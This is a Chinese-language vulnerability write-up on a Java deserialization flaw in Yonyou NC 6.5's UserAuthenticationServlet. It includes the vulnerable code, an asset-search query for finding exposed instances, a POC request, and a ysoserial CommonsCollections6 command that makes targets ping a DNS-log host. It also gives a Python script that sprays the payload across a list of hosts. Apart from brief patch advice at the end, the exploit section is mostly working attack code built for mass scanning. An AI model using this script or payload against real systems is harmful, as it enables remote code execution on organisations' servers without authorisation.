本文章仅用于技术学习讨论,严禁漏洞利用违法犯罪行为,违者自行承担法律责任。
漏洞介绍
简介
用友NC系统UserAuthenticationServlet方法存在反序列化漏洞,攻击者可执行任意命令,获取敏感信息。
影响版本
用友NC6.5
原理分析
漏洞位于UserAuthenticationServlet接口处。
关键代码如下:
protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { ObjectInputStream in = new ObjectInputStream((InputStream)request.getInputStream()); HashMap<Object, Object> headInfo = new HashMap<>(); ObjectOutputStream oos = null; oos = new ObjectOutputStream((OutputStream)response.getOutputStream()); HashMap<Object, Object> resultMap = new HashMap<>(); try { headInfo = (HashMap<Object, Object>)in.readObject();
in.readObject()对输入进行了反序列化。
资产测绘
app="用友-UFIDA-NC"
漏洞利用
利用过程介绍
POC:
POST /servlet/~uapim/nc.bs.pub.im.UserAuthenticationServlet HTTP/1.1
Host: host:port
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36反序列化payload
反序列化payload可以使用ysoserial生成,也可以用其他工具生成。
ysoserial下载地址:
https://github.com/frohoff/ysoserial/releases/tag/v0.0.6
命令:
java -jar ysoserial-all.jar CommonsCollections6 "ping your_dnslog" > file_name.bin
dnslog可使用https://dig.pm/获取域名
使用POC之后检查dnslog平台是否有记录即可。有记录就有漏洞,没有记录就下一个。
python脚本
需要注意的是,扫描出来的result不一定是存在漏洞的。需要在dnslog中找到对应域名的记录。
python批量扫描脚本如下:
import requests
import urllib3
import tldextract
import subprocess# 关闭 SSL 相关警告
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)def generate_payload(domain):"""调用 ysoserial 动态生成 payload"""try:result = subprocess.run(["java", "-jar", "/your_path/ysoserial-all.jar", "CommonsCollections6", f"ping {domain}.your_dnslog"],capture_output=True,check=True)return result.stdout # bytesexcept subprocess.CalledProcessError as e:print(f"[!] ysoserial 生成失败: {e}")return Nonedef get_root_domain(url):extracted = tldextract.extract(url)return f"{extracted.domain}.{extracted.suffix}"def verify_injection(base_url, output_file):poc = "/servlet/~uapim/nc.bs.pub.im.UserAuthenticationServlet" # 示例 POC,请根据实际情况修改url = base_url.rstrip("/") + poc# 提取主域名root_domain = get_root_domain(base_url)post_data = generate_payload(root_domain)headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"}try:response = requests.post(url, data=post_data,timeout=5, verify=False, headers=headers)if response.status_code == 200:result = f"{url}"print(f"[+] Possible injection at {url}")with open(output_file, "a", encoding="utf-8") as fff:fff.write(result + "\n")except requests.RequestException as e:pass# print(f"[!] Error requesting {base_url}: {e}")if __name__ == "__main__":output_file = "result.txt"# 从 hosts.txt 逐行读取目标with open("hosts.txt", "r", encoding="utf-8") as f:hosts = [line.strip() for line in f if line.strip()]total = len(hosts)for i, host in enumerate(hosts, start=1):if i%20==0:print(f"[{i}/{total}] Scanning {host} ...")verify_injection(host, output_file)
实战结果
可以看到dnslog中出现了对应域名的记录。证明存在java反序列化漏洞。
修复方法
1.安装用友NC最新的补丁。使用其他版本的用友NC。
2.对接口添加身份验证并。
结果展示
